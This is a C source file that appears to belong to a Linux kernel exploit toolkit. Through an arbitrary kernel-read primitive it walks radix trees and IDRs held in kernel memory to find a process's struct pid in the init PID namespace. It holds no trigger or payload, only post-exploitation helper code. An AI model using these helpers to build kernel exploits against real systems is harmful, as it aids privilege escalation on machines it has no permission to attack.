#include <limits.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/user.h>

#include "exploit_prims.h"
#include "kernel_helpers.h"

/*
 * Largest index addressable below a node with the given shift:
 * (RADIX_TREE_MAP_SIZE << shift) - 1.
 *
 * `shift` is taken from node data copied out of kernel memory, so it is not
 * trusted. Shifting an unsigned long by >= its width is undefined behaviour
 * in C; such shifts saturate to ULONG_MAX instead. Assuming
 * RADIX_TREE_MAP_SIZE is a power of two > 1 (as in the kernel), the largest
 * in-range shifts already wrap to ULONG_MAX, so this is consistent with them.
 */
static inline unsigned long shift_maxindex(unsigned int shift)
{
    if (shift >= sizeof(unsigned long) * CHAR_BIT)
        return ULONG_MAX;

    return ((unsigned long)RADIX_TREE_MAP_SIZE << shift) - 1;
}

/*
 * Largest index covered by the subtree rooted at `node`.
 * `node` is a local copy of the node, not a kernel address.
 */
static inline unsigned long node_maxindex(const struct radix_tree_node *node)
{
    const unsigned int node_shift = node->shift;

    return shift_maxindex(node_shift);
}

/*
 * Strip the RADIX_TREE_INTERNAL_NODE tag bit from a tree entry, yielding
 * the node address it refers to.
 */
static inline struct radix_tree_node *entry_to_node(void *ptr)
{
    const unsigned long untagged = (unsigned long)ptr & ~RADIX_TREE_INTERNAL_NODE;

    return (struct radix_tree_node *)untagged;
}

/*
 * True when the low tag bits of `ptr` (selected by RADIX_TREE_ENTRY_MASK)
 * equal RADIX_TREE_INTERNAL_NODE, i.e. the entry refers to another node.
 */
static inline bool radix_tree_is_internal_node(void *ptr)
{
    const unsigned long tag = (unsigned long)ptr & RADIX_TREE_ENTRY_MASK;

    return tag == RADIX_TREE_INTERNAL_NODE;
}

/*
 * Descend one level of a radix tree whose nodes live in kernel memory.
 *
 * Copies the node at kernel address `parent` into a local buffer. It then
 * selects the slot that `index` falls into at that node's level and stores
 * the slot's contents (an entry, possibly a tagged internal-node pointer)
 * in *nodep.
 *
 * Returns the slot offset within `parent`.
 *
 * If the copied shift is not a valid shift amount for unsigned long,
 * `index >> shift` would be undefined behaviour. This can happen, for
 * example, if the bytes read are not a live node. In that case *nodep is
 * set to NULL and 0 is returned. NULL is not an internal node, so callers
 * stop descending.
 */
static unsigned int radix_tree_descend(context* ctx, const struct radix_tree_node *parent,
            struct radix_tree_node **nodep, unsigned long index)
{
    struct radix_tree_node node_in = {0};
    unsigned int offset;
    void *entry;

    kernel_read_bytes(ctx, (uint64_t)parent, (void*)&node_in, sizeof(node_in));

    if ((size_t)node_in.shift >= sizeof(index) * CHAR_BIT) {
        *nodep = NULL;
        return 0;
    }

    /* Masking keeps the offset within the node's slot array. */
    offset = (index >> node_in.shift) & RADIX_TREE_MAP_MASK;
    entry = node_in.slots[offset];

    *nodep = entry;
    return offset;
}

/*
 * Inspect the head of a radix tree whose root struct is already in local
 * memory.
 *
 * *nodep always receives the raw head entry.
 * - Head tagged as an internal node: that node is copied from kernel memory,
 *   *maxindex is set to the largest index it covers, and the return value is
 *   its shift plus RADIX_TREE_MAP_SHIFT.
 * - Otherwise: *maxindex is 0 and 0 is returned.
 */
static unsigned radix_tree_load_root(context* ctx, const struct radix_tree_root *root,
        struct radix_tree_node **nodep, unsigned long *maxindex)
{
    struct radix_tree_node *head = root->xa_head;
    struct radix_tree_node remote_copy = {0};

    *nodep = head;

    if (!radix_tree_is_internal_node(head)) {
        *maxindex = 0;
        return 0;
    }

    kernel_read_bytes(ctx, (uint64_t)entry_to_node(head), (void*)&remote_copy,
                      sizeof(remote_copy));
    *maxindex = node_maxindex(&remote_copy);
    return remote_copy.shift + RADIX_TREE_MAP_SHIFT;
}

/*
 * Look up `index` in a radix tree. The root struct has been copied into local
 * memory; the nodes are still in kernel memory and are read via
 * kernel_read_bytes().
 *
 * Returns the entry stored at `index`, or NULL in any of these cases:
 * - `index` is beyond the tree's range;
 * - the walk reaches an empty slot;
 * - the walk keeps hitting RADIX_TREE_RETRY.
 *
 * If `nodep` is non-NULL, it receives the kernel address of the last internal
 * node visited, or NULL if no internal node was visited.
 *
 * If `slotp` is non-NULL, it receives the address of the slot holding the
 * returned entry. This is a kernel address inside that node. When no internal
 * node was visited, it is instead &root->xa_head within the caller's local
 * root copy.
 *
 * Neither out-parameter is written on the early NULL returns (index out of
 * range, too many restarts).
 */
void *__radix_tree_lookup(context* ctx, const struct radix_tree_root *root,
              unsigned long index, struct radix_tree_node **nodep,
              void ***slotp)
{
    /*
     * `root` is a snapshot that is never re-read, so restarting only helps
     * if the kernel nodes change between reads. Bound the restarts rather
     * than spinning forever on a stale RADIX_TREE_RETRY entry.
     */
    enum { LOOKUP_MAX_RESTARTS = 64 };
    unsigned int restarts = 0;
    struct radix_tree_node *node, *parent;
    unsigned long maxindex;
    void **slot;

 restart:
    parent = NULL;
    slot = (void **)&root->xa_head;
    radix_tree_load_root(ctx, root, &node, &maxindex);

    if (index > maxindex)
        return NULL;

    while (radix_tree_is_internal_node(node)) {
        struct radix_tree_node parent_copy = {0};
        unsigned offset;

        parent = entry_to_node(node);
        offset = radix_tree_descend(ctx, parent, &node, index);

        /*
         * Kernel address of parent->slots[offset]. Computed with integer
         * arithmetic because `parent` is a kernel pointer that is never
         * dereferenced locally. Pointing into a local copy would leave
         * *slotp dangling once this function returns.
         */
        slot = (void **)((uintptr_t)parent
                         + offsetof(struct radix_tree_node, slots)
                         + (uintptr_t)offset * sizeof(*slot));

        if (node == RADIX_TREE_RETRY) {
            if (++restarts > LOOKUP_MAX_RESTARTS)
                return NULL;
            goto restart;
        }

        /* The parent's shift decides whether to keep descending. */
        kernel_read_bytes(ctx, (uint64_t)parent, (void*)&parent_copy, sizeof(parent_copy));
        if (parent_copy.shift == 0)
            break;
    }

    if (nodep)
        *nodep = parent;
    if (slotp)
        *slotp = slot;
    return node;
}

/*
 * Return the entry stored at `index`, or NULL if there is none.
 * The tree's root is a local copy; its nodes are read from kernel memory.
 * Convenience wrapper that discards the node/slot out-parameters.
 */
void *radix_tree_lookup(context* ctx, const struct radix_tree_root *root, unsigned long index)
{
    struct radix_tree_node **unused_node = NULL;
    void ***unused_slot = NULL;

    return __radix_tree_lookup(ctx, root, index, unused_node, unused_slot);
}

/*
 * Return the pointer associated with `id` in an IDR whose struct is a local
 * copy, or NULL.
 *
 * The backing radix tree is indexed relative to idr_base. An id below
 * idr_base therefore wraps around to a large unsigned index.
 */
void *idr_find(context* ctx, const struct idr *idr, unsigned long id)
{
    const unsigned long tree_index = id - idr->idr_base;

    return radix_tree_lookup(ctx, &idr->idr_rt, tree_index);
}

/*
 * Look up `process_number` in the PID namespace at ctx->init_proc_ns_addr.
 *
 * The namespace struct is copied into a zero-initialised local buffer. Its
 * IDR is then searched, with the tree nodes read from kernel memory.
 *
 * Returns the entry found (a kernel pointer), or NULL.
 * NOTE(review): the return value of kernel_read_bytes is not checked. A
 * failed read leaves the buffer zeroed — TODO confirm that yields NULL.
 */
struct pid *find_pid_ns(context* ctx, int process_number)
{
    struct pid_namespace init_ns;

    memset(&init_ns, 0, sizeof(init_ns));
    kernel_read_bytes(ctx, ctx->init_proc_ns_addr, (void*)&init_ns, sizeof(init_ns));

    return idr_find(ctx, &init_ns.idr, process_number);
}
